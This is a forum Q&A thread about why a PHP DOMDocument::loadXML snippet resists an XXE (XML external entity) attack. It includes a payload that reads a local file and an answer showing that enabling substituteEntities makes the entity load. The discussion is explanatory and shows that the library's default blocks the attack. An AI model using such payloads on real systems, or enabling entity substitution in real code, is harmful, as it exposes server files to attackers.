Please give me a hint why my code is NOT vulnerable to XXE.
code:
$text = $_POST['textarea'];
$doc= new DOMDocument();
$doc->loadXML($text);
echo $doc->textContent;
testcase 1:
<justsomexmltag>Hello world</justsomexmltag>
result 1:
Hello world
So far so good. However, when I'm trying to inject XML code to retrieve a local file's content:
<?xml version="1.0"?>
<!DOCTYPE log [
<!ENTITY ent SYSTEM "test.txt">
]>
<log><text>&ent;</text></log>
then nothing is printed. "test.txt" is on the same level in the file structure as the php file where I carry out the attack. I have tried
<!ENTITY ent SYSTEM file:///"test.txt">
as well as
<!ENTITY ent SYSTEM file:///full path to the file>
but to no avail.
test.txt:
This is just a test.
Have tried:
<test>This is just a test.</test>
no results.
Any hints?
reflecting @Paul Crovella, here's an edit:
CP-ing your code resulted in:
DOMDocument::loadXML(): I/O warning : failed to load external entity file:// full path to file name
DOMDocument::loadXML(): Failure to process entity ent in Entity
DOMDocument::loadXML(): Entity 'ent' not defined in Entity
By default libxml will not load external entities precisely to avoid this issue. To convince it to do so you'd need to set either substituteEntities or validateOnParse to true prior to loading. E.g.:
$xml = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE log [
<!ENTITY ent SYSTEM "test.txt">
]>
<log><text>&ent;</text></log>
XML;
$dom = new DOMDocument();
$dom->substituteEntities = true;
$dom->loadXML($xml);
echo $dom->textContent;
Outputs:
This is just a test.